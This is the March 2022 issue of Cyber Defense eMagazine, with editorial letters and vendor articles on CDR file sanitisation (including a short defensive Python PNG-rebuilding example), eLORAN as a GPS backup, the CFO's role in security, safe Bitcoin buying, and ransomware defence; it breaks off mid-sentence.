Cyber Defense eMagazine March Edition for 2022
The view from the Publisher’s desk is very encouraging, based on celebrating 10 years of growth and success at Cyber Defense Magazine! When our tiny team began our journey at Cyber Defense Media Group (CDMG) together in January 2012, we were happy to help smaller, lesser-known innovators of infosec, get their message out there and Rise Above the noise. Now, after 10 years, we’re even helping multi-billion-dollar companies and governments around the globe with our offices in DC, London, FL, NY and other locations in play, as we continue to scale, thanks to you – our readers, listeners, viewers and media partners. Beyond the magazine, in response to the demands of our markets, the scope of CDMG’s activities has grown into many media endeavors. They now include Cyber Defense Awards; Cyber Defense Conferences; Cyber Defense Professionals (job postings site being revamped); Cyber Defense TV, Radio, and Webinars; and Cyber Defense Ventures (partnering with investors). Please check them out and see how much more CDMG has to offer! Very respectfully and with much appreciation, Gary Miliefsky, Publisher
Why Changing Classified Document Status Can Affect Risk Levels and How Proactive Cybersecurity Methods Can Help
Ransomware — Encrypt Your Data Before Others Do
The Role of The CFO In Enterprise Cyber Security
…and much more…
Cyber Defense eMagazine – March 2022 Edition 1
Copyright © 2022, Cyber Defense Magazine. All rights reserved worldwide.
CONTENTS
Welcome to CDM’s March 2022 Issue ---- 7
Why Changing Classified Document Status Can Affect Risk Levels and How Proactive Cybersecurity Methods Can Help ---- 18
By Sam Hutton, SVP, Glasswall
The Fragility of a GPS Centric World and the Importance of eLORAN ---- 21
By Dan Dickey, President, Continental Electronics Corporation
The Role of The CFO In Enterprise Cyber Security ---- 25
By Glenn Murray, CEO at Sapien Cyber
The Safest Ways for Bitcoin Trading ---- 29
By Robert Wilson, Freelancer
Ransomware — Encrypt Your Data Before Others Do ---- 32
By Robert Freudenreich, CTO and Founder, Secomba GmbH | Boxcryptor
Endpoint Malware and Ransomware Volume Already Exceeded 2020 Totals by the End of Q3 2021 ---- 36
By Corey Nachreiner, CSO, WatchGuard Technologies
Don’t Become a Horrible Headline: Some Tips on Redesigning Your Threat Posture for The 2022 Threat Landscape ---- 39
By Omar Zarabi, Founder and CEO, Port53 Technologies
Have We Learned from Our Past Mistakes to Prevent Future Cyberattacks? ---- 43
By Marc Packler, President, CISO Advisory, Silent Quadrant
How to strengthen cyber resilience with Unified BCDR ---- 47
By Joe Noonan, General Manager, Unitrends and Spanning
3 Cybersecurity Certainties for 2022 ---- 50
By Bill Moore, XONA
Is XDR The Right Solution for Today’s Security Threats? ---- 53
By Steve Garrison, VP Marketing, Stellar Cyber
Why the Future of Threat Detection and Prevention is Unified Security and Risk Analytics ---- 56
By Sanjay Raja, VP of Product Marketing at Gurucul
Tips And Trends for OT Cybersecurity In 2022: More SOAR, Cyber Hygiene And Renewed Compliance ---- 60
By Peter Lund, Vice President of Product Management at OT security company Industrial Defender
Top 10 Reasons Cyber Defense Firms Should Hire Veterans ---- 63
By Bryon Kroger, Founder of Rise8
5 Reasons Organizations Need Comprehensive AD Security Across Cloud and On-Prem ---- 67
By Justin Kohler, Director of BloodHound Enterprise at SpecterOps
Directed Analytics - The Future of Data Management ---- 71
By Simon Rolph, CEO & Founder of Such Sweet Thunder
Phishing Techniques in Disguise: What to Look for And Why You Should ---- 74
By Rotem Shemesh, Lead Product Marketing Manager, Security Solutions, at Datto
Are You Prepared for the New Normal of Jekyll and Hyde Data? ---- 77
By Howard Ting, CEO, Cyberhaven
How To Defend Railway Subsystems from Targeted Cyber-Attacks ---- 80
By Michael Cheng, Director at TXOne Networks & C. Max. Farrell, Senior Technical Marketing Specialist at TXOne Networks
Biggest Cyber Trend in 2022 ---- 84
By Guy Rosefelt, CPO, Sangfor Technologies
On The Frontline in The War Against Hackers ---- 89
By Damien Fortune, Chief Operations Officer of Secured Communications
How to Fix Mid-Market Security Using Intelligent Automation and AI ---- 91
By Guy Moskowitz, CEO, Coro
5 Ways Cybersecurity Will Change In 2022 ---- 95
By Jaime Coreano, Vice President of Sales – Flexxon
Executive Order Instructs Certain Organizations to Improve Their Cybersecurity Stance ---- 99
By Bob Thibodeaux, Chief Information Security Officer, DefenseStorm
Too Hot to Handle: The case for Zero Trust and SASE ---- 103
By Jonathan Lee, Senior Product Manager, Menlo Security
Lessons Learned: In the Principle Of “Least Privilege,” Where Do Companies Fall Short? ---- 106
By Raj Dodhiawala, President, Remediant
Redefining Resilience in The New World of Work ---- 109
By Andrew Lawton, CEO of Reskube Ltd
@MILIEFSKY
From the Publisher…
Dear Friends,
We’ll be celebrating our 10th Year in business and of our Global InfoSec Awards and as a Platinum Media Partner of RSA Conference on June 06 – 09, 2022 – See You There!
As international tensions rise, and manifest themselves as cybersecurity threats and attacks, the role of
Cyber Defense Media Group becomes even more important than during “ordinary” times. We face both
a reality and a challenge, but one we are well prepared to undertake.
As our Editor-in-Chief has noted in his welcome message, we are now emphasizing immediacy of issues,
and moving away from a fixed annual calendar, in order to support our community in responding
effectively to the most pressing cybersecurity issues of the day.
In that spirit, let me take this occasion to invite both our contributors and readers to submit, or suggest
topics for, articles you perceive to be most valuable to you in your professional activities. “Actionable
intelligence” continues to be our watchword, and we welcome thoughts and suggestions from our entire
community.
I would like to reiterate that, beyond the magazine, in response to the demands of our markets, the scope
of CDMG’s activities has grown into many media endeavors. We now offer Cyber Defense Awards;
Cyber Defense Conferences; Cyber Defense Professionals (job postings); Cyber Defense TV, Radio,
and Webinars; and Cyber Defense Ventures (partnering with investors).
Please check them out and see how much more CDMG has to offer!
The full list, with links, can be accessed at:
https://www.cyberdefensemagazine.com/cyber-defense-media-group-10-year-anniversary-dailycelebration-in-2022/
Warmest regards,
Gary S. Miliefsky, CISSP®, fmDHS
CEO, Cyber Defense Media Group
Publisher, Cyber Defense Magazine
P.S. When you share a story or an article or information about CDM, please use #CDM and @CyberDefenseMag and @Miliefsky – it helps spread the word about our free resources even more quickly.
@CYBERDEFENSEMAG
CYBER DEFENSE eMAGAZINE
Published monthly by the team at Cyber Defense Media Group
and distributed electronically via opt-in Email, HTML, PDF and
Online Flipbook formats.
EDITOR-IN-CHIEF
Yan Ross, JD
Yan.Ross@cyberdefensemediagroup.com
ADVERTISING
Marketing Team
marketing@cyberdefensemagazine.com
CONTACT US:
Cyber Defense Magazine
Toll Free: 1-833-844-9468
International: +1-603-280-4451
http://www.cyberdefensemagazine.com
Copyright © 2022, Cyber Defense Magazine, a division of
CYBER DEFENSE MEDIA GROUP
1717 Pennsylvania Avenue NW, Suite 1025
Washington, D.C. 20006 USA
EIN: 454-18-8465, DUNS# 078358935.
All rights reserved worldwide.
PUBLISHER
Gary S. Miliefsky, CISSP®
Learn more about our founder & publisher at:
http://www.cyberdefensemagazine.com/about-our-founder/
10 YEARS OF EXCELLENCE!
Providing free information, best practices, tips, and techniques
on cybersecurity since 2012, Cyber Defense magazine is your
go-to-source for Information Security. We’re a proud division
of Cyber Defense Media Group:
CYBERDEFENSEMEDIAGROUP.COM
Welcome to CDM’s March 2022 Issue
From the Editor-in-Chief
In editing, as in other activities, it’s important from time to time to review all processes and products in
order to assure they are working smoothly.
As my Dad often said: “You can’t tell how you stand from where you sit.”
At this point, in conducting such a review, it appears that we have two aspects of our editorial process
which are no longer in sync with each other: the annual editorial calendar and the submission of articles
from sources in the cybersecurity industry.
It has become clear that the strictures of a monthly calendar simply don’t work efficiently for CDM to bring
to our audience the most current and relevant articles on topics of vital interest.
As part of the central role Cyber Defense Magazine plays in the breadth of activities conducted by the
entire Cyber Defense Media Group, we do now and will continue in the future to select and publish the
most actionable intelligence from the most knowledgeable writers in the field.
Of course, as we perceive patterns in the trends in cybersecurity, and the submission of articles, we will
always be responsive to the needs and interests of both authors and readers.
Wishing you all success in your cybersecurity endeavors,
Yan Ross
Editor-in-Chief
Cyber Defense Magazine
About the US Editor-in-Chief
Yan Ross, J.D., is a Cybersecurity Journalist & U.S. Editor-in-Chief of Cyber Defense Magazine. He is an accredited author and educator and has provided editorial services for award-winning best-selling books on a variety of topics. He also serves as ICFE's Director of Special Projects and is the author of the Certified Identity Theft Risk Management Specialist® XV CITRMS® course. As an accredited educator for over 20 years, Yan addresses risk management in the areas of identity theft, privacy, and cyber security for consumers and organizations holding sensitive personal information. You can reach him by e-mail at yan.ross@cyberdefensemediagroup.com
Why Changing Classified Document Status Can Affect Risk Levels and How Proactive Cybersecurity Methods Can Help
By Sam Hutton, SVP, Glasswall
As ransomware attacks, insider threats, data breaches and phishing attacks against government agencies continue to skyrocket, organisations are at constant risk. Recent incidents such as JBS Foods, Colonial Pipeline and SolarWinds in 2020 prove that organisations need to be aware of any vulnerability that could potentially expose sensitive data.
Security risks for remote federal employees and government agencies
Since there is a discussion on keeping federal workers remote, there are concerns around the decreased level of precautions being taken toward cyber risks and the legal implications associated with cyberattacks. The 2021 Thales Data Report: Global Edition stated that 82% of people expressed some level of concern while working remotely. This number is even higher for federal employees at 84%. Remote work can carry more risk of cyber attacks than office work because at-home connections are generally less secure, making them easier for cybercriminals to access. The report also notes that only 44% of employees were not confident in their existing security protocols.
For companies, organisations and government agencies, there can be legal repercussions from cyberattacks too. According to the Securities and Exchange Commission and the Commodity Futures Trading Commission, while state and federal regulations vary, further reporting may be required depending on the conditions of the cyberattack and the type of data that was compromised.
The impact of malware on classified files
Malware operates by infiltrating a point of weakness in a network and then beginning lateral movement. Bad actors understand this and will move through an organisation undetected, attempting to gather as much data as possible. For federal agencies, documents that enter government systems at an unclassified point are viewable by a wider audience; however, once they are promoted to a classification level, whether confidential, secret or top secret, there is a chance that malware travels with them.
“Classified” denotes information specifically designated by a U.S. government agency for limited, restricted dissemination or distribution. When documents are moved up or down between confidentiality levels, valuable information is at stake. If files that were previously unclassified carry hidden viruses, there is an opportunity for digital adversaries to break into top-secret networks and infiltrate government information. This could enable them to steal trade secrets or learn about secret foreign policies or military tactics, which in turn can put lives at risk.
SolarWinds, one of the most catastrophic cyberattacks in U.S. history, resulted in the compromise of major enterprises and government agencies including the Department of Homeland Security and the Treasury Department for over 14 months before being discovered. The hackers broke into SolarWinds’ systems by inserting malicious code into a product known as “Orion”, widely used by companies to manage IT resources. This code created the opening for the hackers to install malware that allowed them to spy on those companies. Because the intrusion moved so stealthily, some of those affected may still be unaware. Bad actors know how to identify loopholes in a system to gain access to sensitive information. This further proves the value of implementing strict cybersecurity methods to ensure that sensitive data is protected. Proactive, zero-trust cybersecurity methods need to be in place as government documents go through the confidentiality cycle, to ensure that all files are protected and monitored.
How Content Disarm and Reconstruction (CDR) technology can help
It is imperative that federal agencies take a proactive approach to their file security methods. CDR technology cleans and rebuilds files to a ‘known good’ industry standard, automatically removing potential threats. Reactive cybersecurity strategies such as anti-virus software and sandboxing are no longer effective enough to keep up with the growing sophistication of cyberattacks. In fact, they can place users in the direct line of attack and increase the pressure on teams to handle threats. CDR addresses areas of weakness by rebuilding files and removing the parts that could carry a vulnerability. For government agencies, it helps close loopholes and allows leaders to focus on more important things such as policy making and strategy.
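CDR in miniature, as an added example that is not part of the article and not Glasswall’s product: a PNG is parsed against its specification and rebuilt from only the chunks a viewer needs, so text chunks, private chunks and bytes appended after the end marker are discarded without any signature matching. The sample file is constructed inline.

```python
"""Minimal Content Disarm and Reconstruction (CDR) for PNG files.

Added illustration, not Glasswall's product. Instead of scanning for known-bad
content, parse the file against its specification and re-emit only the
structures known to be good; the sample file below is constructed inline.
"""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Chunks a viewer needs to render the image. Anything else (text comments,
# timestamps, private or unknown chunks, bytes after IEND) is dropped.
ALLOWED_CHUNKS = {b"IHDR", b"PLTE", b"IDAT", b"IEND"}


class RebuildError(ValueError):
    """Raised when the input cannot be parsed as a structurally valid PNG."""


def parse_chunks(data):
    """Yield (type, payload) per chunk, verifying length and CRC; stop at IEND."""
    if not data.startswith(PNG_SIGNATURE):
        raise RebuildError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        start, end = pos + 8, pos + 8 + length
        if end + 4 > len(data):
            raise RebuildError("truncated %r chunk" % ctype)
        payload = data[start:end]
        (crc,) = struct.unpack(">I", data[end:end + 4])
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise RebuildError("CRC mismatch in %r chunk" % ctype)
        yield ctype, payload
        pos = end + 4
        if ctype == b"IEND":
            return  # anything after IEND is never read, so never copied
    raise RebuildError("missing IEND chunk")


def encode_chunk(ctype, payload):
    """Serialise one chunk with a freshly computed CRC."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def rebuild_png(data):
    """Return (rebuilt_png, dropped_chunk_types).

    The rebuilt file contains only allow-listed chunks, each re-serialised by
    us; dropped_chunk_types is what a CDR gateway would report to the owner.
    """
    parsed = list(parse_chunks(data))
    types = [t for t, _ in parsed]
    if types[0] != b"IHDR" or types[-1] != b"IEND" or b"IDAT" not in types:
        raise RebuildError("IHDR/IDAT/IEND missing or out of order")
    if len(parsed[0][1]) != 13:
        raise RebuildError("IHDR must be exactly 13 bytes")
    # The image stream must at least be a valid zlib stream; a production CDR
    # engine would decode the pixels and re-encode them rather than copy it.
    image = b"".join(p for t, p in parsed if t == b"IDAT")
    try:
        zlib.decompress(image)
    except zlib.error as exc:
        raise RebuildError("IDAT is not a valid zlib stream: %s" % exc)
    kept, dropped = [], []
    for ctype, payload in parsed:
        if ctype in ALLOWED_CHUNKS:
            kept.append(encode_chunk(ctype, payload))
        else:
            dropped.append(ctype.decode("latin-1"))
    return PNG_SIGNATURE + b"".join(kept), dropped


def verdict(data):
    """Gateway-style wrapper: ('rebuilt', dropped) or ('rejected', reason)."""
    try:
        _, dropped = rebuild_png(data)
        return ("rebuilt", dropped)
    except RebuildError as exc:
        return ("rejected", str(exc))


def build_sample_png():
    """Constructed 1x1 red RGB PNG carrying extra chunks and trailing bytes."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\xff\x00\x00")  # filter byte 0 + one RGB pixel
    chunks = [
        encode_chunk(b"IHDR", ihdr),
        encode_chunk(b"tEXt", b"Comment\x00constructed sample"),
        encode_chunk(b"IDAT", idat),
        encode_chunk(b"zzZz", b"\x00" * 16),  # private chunk no viewer needs
        encode_chunk(b"IEND", b""),
    ]
    return PNG_SIGNATURE + b"".join(chunks) + b"bytes after IEND"
```

Running `rebuild_png(build_sample_png())` yields a file holding only IHDR, IDAT and IEND and reports `tEXt` and `zzZz` as dropped; a file whose CRCs or structure do not match the specification is rejected rather than passed through.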
The hackers behind SolarWinds are still actively trying to break into federal agencies. Cyberattacks are expected to become more prolific and more sophisticated as attackers develop new strategies for getting into private networks. Although efforts are being made to improve the government’s cybersecurity, such as Biden’s recent cybersecurity bill, which promises a more comprehensive plan to mitigate risk, there is a crucial need to take steps to protect the safety of classified documents. Organisations that implement a proper system of proactive cybersecurity will be better prepared to handle an attack when it comes.
About the Author
Sam Hutton, SVP, North America, Glasswall
"Sam prides himself on offering perfect partnership (and true collaboration) to organizations all over North America. Because with over 20 years’ experience in selling and delivering solutions to financial, security, defense and commercial sectors in this space, Sam knows even the most cutting-edge technology needs the best team of people to support it."
Sam can be reached online at https://www.linkedin.com/in/samhutton-8b08243/ and at our company website https://www.glasswallsolutions.com/
The Fragility of a GPS Centric World and the Importance of eLORAN
By Dan Dickey, President, Continental Electronics Corporation
Both the importance of GPS systems and their vulnerability to a cyber incident or attack are well
understood. What is less understood is that GPS and the satellites behind them now comprise
the very threads in the fabric of our modern economy.
The value of GPS is built on three primary pillars: position, navigation and timing (PNT). While position and navigation are a logical given, the exact time is the unsung contribution of GPS that largely affects the way our world functions. Without an accurate source of timing, banks would be unable to timestamp payments. In fact, they couldn’t conduct any kind of banking without GPS. Communications networks could not communicate, the stock market would seize, ships and aircraft would be imperiled and our various terrestrial networks from power grids to broadcasting and cloud computing – and the Internet itself – would fail or slow down dramatically.
The newest 5G based systems also depend on GPS as their primary source of time. A staggering number of critical systems necessary for modern life are wholly dependent on GPS, with no other source of accurate time traceable to a primary standard.
Other countries have deployed their own systems such as BeiDou (China) and GLONASS (Russia). Today’s threat analysts are aware that being 100% dependent on space-based systems with no other PNT alternative leaves America’s national security profoundly vulnerable to a wide variety of attackers. Both single-person local attacks and nation-state threats are easily conceived.
This leads to the question, “What is the likelihood of our GPS system failing?” The possibility of
a system-wide failure is remote. But the impact of such a failure is incalculable. The reality is
that GPS satellite signals are vulnerable, not only to space weather, missiles, space debris and
general wear and tear, but also to bad actors on the ground via spoofing and jamming. If we
continue to rely exclusively on GPS it will remain an attractive attack surface because nearly all
modern systems depend on it as a source of coordinated universal time.
Many analysts see such an exploitation as a matter of when, not if. Bad actors – any
cybersecurity adversary interested in attacking IT systems – may harness a spoofing attack, an
intelligent form of interference which makes the receiver unusable or worse by making it believe
it is at a false location. Even traditional means of intentional interference such as jamming can
still jeopardize GPS transmissions as effectively as they did to international broadcasting
stations during the Cold War.
Alarmingly, successful satellite hacking has already occurred multiple times over the last 20 years and was first noted as far back as 1998, when hackers took control of the U.S.-German ROSAT X-Ray satellite. Over the years, hacking became more prevalent, with two more successful attacks, believed to be led by China, in 2008 and 2018. In response to the growing number of threats, specifically from Russia, China and Iran, the U.S. created the Space Force in 2019, specifically designed to operate and defend military satellites and ground stations that provide communications, navigation and Earth observation. While enhancing the profile of these initiatives is a step in the right direction, a more robust strategy is needed to ensure accurate PNT in case threats slip through new security measures. An equally dependable and ubiquitous source of position and time is the best way to minimize the attractiveness of the GPS system as an attack vector. eLORAN is the perfect tool to fill this role in any nation’s security.
Enhanced Loran (eLORAN) is a positioning, navigation and timing (PNT) service for use by
many modes of transport and a secure source of time for countless systems critical to everyday
life. eLORAN is terrestrial based, meaning that instead of low power signals beamed from space,
it utilizes much higher power transmitters which are difficult and expensive to jam. It is fully
independent from GPS because it provides an independent source of accurate location and time
traceable to a national time standard.
Formerly known as LOng-RAnge Navigation (LORAN), eLORAN is “enhanced” to provide
accurate time and geolocation data whereas LORAN originally only provided approximate
location information. eLORAN is a modern digital system, which builds on proven analog radio
frequency technologies such as Loran-C. eLORAN can provide robust and accurate position,
navigation and time data across any desired area of the Earth. It can be received in many indoor
and subsurface locations whereas GPS generally requires an unobstructed view of the sky. This
makes eLORAN receiver installations less visible and thus more easily secured.
Today’s eLORAN systems transmit signals that are three to five million times stronger than
GPS/GNSS and have 99.999% availability and reliability. Each tower has up to a 1,200-mile
signal range. Its spectrum of 90-110 kHz is internationally protected, and eLORAN is deployable
rapidly, so military branches can quickly set up systems anywhere in the world.
An eLORAN system designed to cover the contiguous United States requires only a handful of towers for mission-critical timing applications. Fewer than two dozen high-power transmission sites are needed for full CONUS position and navigation capability.
eLORAN is a practical solution that is too often underestimated by planners and analysts, many
of whom are not familiar with modern eLORAN. They know GPS is vulnerable but may not be
aware of recent advancements that make eLORAN practical, affordable and deployable now.
Fortunately, there is a renewed and growing national consensus that the deployment of eLORAN must be accelerated to strengthen the nation’s infrastructure, which is increasingly and solely dependent on GPS. Companies such as ours, with a tradition of innovation and RF leadership, have spearheaded development of the latest generation of this technology. Through these efforts many of the past cost and technological constraints, such as the land area needed for eLORAN transmission towers, have been overcome. Today’s fully digital eLORAN systems reduce antenna tower height by half and the necessary land area by 75%, making eLORAN system planning and deployment much simpler at a time when the world needs the more resilient and independent solution eLORAN provides.
For America and our allies, eLORAN is a necessary and fundamental “fail safe” at a critical time.
About the Author
Dan Dickey has been the President of Continental Electronics Corporation since 2009. Dickey is a named inventor on multiple patents, and has previously held design engineering and management positions at Harris Corp. and ADC Telecommunications. He has published papers through the world’s largest technical professional organization, IEEE, and has co-authored a book on broadcast engineering published by the National Association of Broadcasters. Dickey holds a Bachelor of Science degree in Electrical, Electronics and Communications Engineering from the University of Missouri. For more information about Continental Electronics Corp. please use this link: https://contelec.com.
The Role of The CFO In Enterprise Cyber Security
By Glenn Murray, CEO at Sapien Cyber
Who is responsible for cyber security in your organization? Smart businesses know that it’s not just the
IT teams who need to be investing in cyber security.
Faced with increasingly complex and severe cyber-attacks on operational technology (OT) designed by
criminals who are well-organized, well-financed and willing to wait for the right opportunity to strike,
businesses need everyone in leadership roles to not only acknowledge the situation, but put in place
strategies to minimize risk. This includes the CFO.
The Chief Financial Officer (CFO) plays a crucial part in ensuring that the investment in cyber security
matches not only the potential risks but mirrors the value and importance of the company’s infrastructure,
from financial systems to operational technology networks. In some organizations this can be viewed as
a cost drain. As such, investment levels tend to be far too low relative to the scale of the risk.
It is not uncommon for IT teams or their executives to be rewarded based on reductions in expenditure versus budget, breeding an alarming culture of penny pinching each year. This short-term thinking is putting organizations in jeopardy, and at risk of everything from data breaches to system hacks. A boardroom, including the CFO, that recognizes the devastating effect a cyber-attack can have, both financially and reputationally, will be better placed to protect its ‘crown jewels’ from this new age of cyber criminals.
There is an opportunity to engage the CFO in the full spectrum of cyber security and the potential
mitigations, from IT to OT networks. Great CFOs don’t act as a blocker or barrier but are ready to invest
in comprehensive and robust cyber security systems. Here’s how to make sure your CFO is one of them:
Make clear the opportunity cost
There is, of course, a cost to cyber security systems, but the cost to not having them is far larger. The
average cost of an attack has been rising rapidly and now stands at $3.9 million, according to the annual
Cost of a Data Breach Report by IBM and the Ponemon Institute, although this rises to $8.64 million in
the US. This includes costs of OT systems and hardware, disruptions to critical activity resulting in down
time and business lost, and fines. When put in this context, the investment in cyber security will seem
minimal. Businesses that rely on insurance as mitigation may feel that they are covering the financial
cost, but this does not take into account the cost of reputational damage, which can far exceed any
monetary loss. Further, the insurance market is taking a tougher stance due to the rising frequency and
scale of cyber-attacks. This makes it a multi-faceted challenge for finance leaders.
Think about long term sustainability
Cyber-resilience is about ensuring the continued success of an organization. Business continuity,
reputation and finance are all at stake, but also the potential for injury and even loss of life. Imagine how
much money would be lost if you were unable to service clients, and the reputational damage of a splash
across the headlines. To continually win new business you need to be able to show you are diligent and
trustworthy, and cyber security plays a big role in this. Data security is increasingly important, and
customers will not want to do business with you if their own information is seen to be at risk. Similarly,
vendors will harbor concerns about stability and ultimately shareholders will become worried about
performance.
See cybersecurity not as an IT overhead but an OT asset
Cyber security is not just a tick box or policy adherence exercise, but brings huge value. It’s about more
than IT systems and software – it is essential to keeping OT fully operational. The CFO’s remit spans the
entire business, meaning they are perfectly positioned to support cyber security efforts spanning the
entire estate. They are able to look at the technology and systems and what investment in them can bring
the business from a strategic standpoint.
Improve the risk management framework
The CFO’s job is to finance things that are business critical. If the Chief Information Officer (CIO), Chief
Information Security Officer (CISO) and Senior Management Team (SMT) make cybersecurity part of
everyone’s role, from team members to those at the top of the organization, it ensures it is ingrained in
policy and procedure. By having this shared visibility and responsibility, it will be clearer as to why it needs
financing, not just as a cost centre, but an enabler. Cyber security is about protecting the assets that are
of value to your company, and so should be embedded in everything that you do. Effective governance
is essential to business success.
Help them mitigate potential risks
Across the business we are constantly putting plans and procedures in place to mitigate risk. And most
often this risk is based on potential risk, rather than historic experience. Just because it hasn’t happened
doesn’t mean it won’t. In fact, threats are constantly changing and cyber criminals are increasingly
diversifying the comprehensive strategies that they use to infiltrate organizations. Most businesses have
smoke alarms or defibrillators yet have never had a fire or seen someone have a heart attack during the
working week. They have this equipment installed to minimise the impact of any future disaster. The
same is true of cybersecurity. CFOs should think of cyber security as part of the package that a business
has to mitigate against risk and maintain fully functioning OT at all times to ensure business activity can
proceed as normal. CFOs should therefore be discussing cyber-risk exposure with their CIO and CISO
regularly. This ensures it doesn’t just get thought about on an annual basis but is front of mind all year
round. That regular reminder of why it is so important will help ensure that it is viewed as a business
critical expense that needs to be fully backed financially.
Use their expertise
Your CFO does not have to be a cyber security expert. But their risk management skills will be essential
to asking the right questions around issues such as where data is stored and who has access to it. They
especially understand the risks and issues presented by protecting financial data. By ensuring that your
CFO is part of the process for assessing risk, identifying assets and selecting vendors, they become part
of that process of essential cyber security.
Present a united front
The CFO is a business-critical part of strategic and functional operations across the organization.
Businesses fall prey to cyber-attacks when they have a weak link. We think of clients as castles, and all
of the battlements need to be strong. This includes everyone from the CEO to the cleaner to the
connected systems used to make the business run. Vigilance and security are crucial across the board,
and the CFO is an integral part of that.
We know that cyber security is essential. In the modern working environment, more and more of us are
geographically dispersed and more devices are connected to the internet. At the same time cyber
criminals are getting increasingly sophisticated. Cyber security needs to be a top priority for all
organizations – and all members of those organizations, including the CFO. Investment in cyber security
is absolutely business-critical, and by making your CFO part of the strategic journey of cyber security you
will make it easier to get that much needed sign off.
About the Author
Glenn Murray is the Chief Executive Officer at Sapien Cyber. Glenn has
extensive experience in the management of multi-million dollar projects
in the identification and application of ICT solutions across the oil and
gas, mining, heavy vehicle manufacturing, defence (Electronic
Warfare) and telecommunication industries.
His military background and focus on national security has built a
passion for cyber security and protecting the world we live in. As CEO
of Sapien Cyber, Glenn’s vision is to provide world class cyber security
solutions to critical infrastructure industries globally.
Glenn can be reached online at (https://au.linkedin.com/in/glennmurray,
https://twitter.com/otcybergm?lang=en) and at our company
website https://www.sapiencyber.com.au/.
The Safest Ways for Bitcoin Trading
By Robert Wilson, Freelancer
During the year 2021, we experienced history in the cryptocurrency niche with the 3rd Bitcoin
halving event unfolding. There has been unprecedented hype after this news with a great rise in
interest for the coin around the world. More and more people are expressing their interest in
learning about the places to buy Bitcoin safely and some are asking about how to become a
reputable Bitcoin trader. Although the recent stats may dishearten you from getting into Bitcoin or
crypto for the first time, it is a good idea to get into digital currencies.
Using VPN
A VPN hides your IP address and gives you better anonymity on the internet. Trading cryptocurrency
is more secure with a VPN because it encrypts the internet connection between your device and an
external server, protecting your data in transit. Luckily for Bitcoin traders, almost all crypto
exchanges use HTTPS end-to-end encryption for their activities, so hackers can't intercept the data
this way unless the device you are using is susceptible to other security vulnerabilities. A VPN
adds another layer of security to the proceedings, making your online activities anonymous. You can
read VPN reviews online to find the most suitable option for your case. If a VPN doesn’t seem the
right option, try using residential proxies as a way to secure your privacy and browse anonymously.
Secure avenues for trading Bitcoin
Here are some secure avenues for trading Bitcoin.
1. Using Fiat to Bitcoin exchanges
Using a reputable and well-established cryptocurrency exchange is a simple and convenient
way of buying Bitcoin for fiat through your bank account. The term "fiat" is utilized in the
cryptocurrency sector for denoting government-backed currencies such as GBP, USD, or JPY.
You can buy Bitcoin from several exchanges and the more dependable ones are secure and
straightforward to use. But keep in mind that if your currency is held in custody, meaning you
do not hold the private keys, and the exchange crashes or gets hacked, you will lose all of your
holdings. Therefore it is a good idea to move your funds to a private non-custodial wallet quickly
after buying Bitcoin. Just keep the bare minimum currency required for the transactions.
Remember, there are many fake exchanges on the internet that cheat gullible people. Investors
should only use regulated exchanges that display their permits on their sites.
2. ATM Action
If you take convenience into consideration, nothing beats a Bitcoin ATM, especially
when you are located near one of these machines. The buying process is stress-free: it is
similar to depositing fiat money in the ATM and receiving the BTC afterward. Accurate
info about the machines can be found on Coinatmradar. There are more than 7000 crypto ATMs
available across the world. They allow people to use cash and debit cards for buying Bitcoin and
other similar digital assets. It is also possible to convert BTC into fiat. More than 5000 ATMs are
located in the U.S. alone. Unlike conventional exchanges, these ATMs allow the users to access
a physical kiosk where it is possible to trade fiat with popular digital assets such as ETH, BTC,
and LTC.
3. Using a credit card
Another quite simple way of purchasing Bitcoin is by using credit cards. It is possible to do this
from buy.Bitcoin.com and the users may select either BTC or BCH (Bitcoin Cash) for the
transaction. After you have clicked the Buy button you will get a prompt pop-up asking you to
enter your Bitcoin wallet address. If you do not have a BTC wallet yet, you can find simple
and clear instructions through a "Need a wallet?" option. It offers assistance in downloading
one for free. Even though this alternative normally charges a fixed service charge, it is a quick
and convenient trade-off.
Conclusion
As we enter 2022, there are several references out there for buying Bitcoin. But, due to the
availability of these many alternatives you are going to come across scammers and fraudsters
who will also be geared up to get a piece of your hard-earned coin. Therefore the crypto-buyers
have to be vigilant as there are several dishonest exchanges, sellers, and services out there.
Ensure that you are buying from a credible source.
About the Author
I’m Robert Wilson and I’m a security software developer with
three years of experience as a freelancer. I research, design,
implement and manage software programs; I test and evaluate
new programs. I’m very passionate about writing, reading, and
drawing.
Ransomware — Encrypt Your Data Before Others Do
Don’t let them look at your data.
By Robert Freudenreich, CTO and Founder, Secomba GmbH | Boxcryptor
A single malicious email, with the sender of the mail disguised as a colleague or client, can have severe
consequences for a company. With a fraudulent link that transmits sensitive account data in the wrong
hands or malware disguised as a seemingly ordinary Microsoft Office file, hackers will gain access to
business systems and servers within minutes. In this article, we will take a look at how the cloud and
encryption can help prevent or reduce damage in case of a ransomware attack on your company.
What is Ransomware and Why is it so Dangerous?
Ransomware is malicious software that gives unauthorized people access to company data, programs,
or even the entire computer system. In the case of an attack, business operations are severely affected
and personnel and organizations are locked out of their files and systems. Ransomware attacks not
only have an impact on individual company processes but can also affect the entire supply chain.
The damage usually also affects external stakeholders of the company that was the victim of the attack,
for example customers, suppliers, and partners. With most operations coming to a complete halt,
companies are forced to pay high ransoms in order to regain control over their data and devices.
According to Cybereason’s “Ransomware: The true cost to Business” (Source:
https://www.cybereason.com/hubfs/dam/collateral/ebooks/Cybereason_Ransomware_Research_2021.
pdf), it is estimated that there is a ransomware attack on a business every 11 seconds on average, with
global ransomware damage losses projected to reach $20 billion in 2021. The FBI reported an increase
of more than 225% in total losses from ransomware in the U.S. in 2020 alone.
While the huge amount of ransom is already critically affecting companies, pressure is further increased
when sensitive data is threatened to be publicized. While, in theory, the ransom payment can be settled
rather inconspicuously, data protection laws like the European GDPR require very strict measures when
data of citizens of the European Union is breached. The company, whether American or European, must
notify all affected individuals or businesses about the data loss, which not only results in high
inconveniences but more importantly a loss in trust. According to Cybereason, 53% of all attacked
organizations reported that their brand suffered.
How Can Businesses Prevent Ransomware Attacks?
The likelihood of being affected by viruses or malware can be kept within limits if some internal company
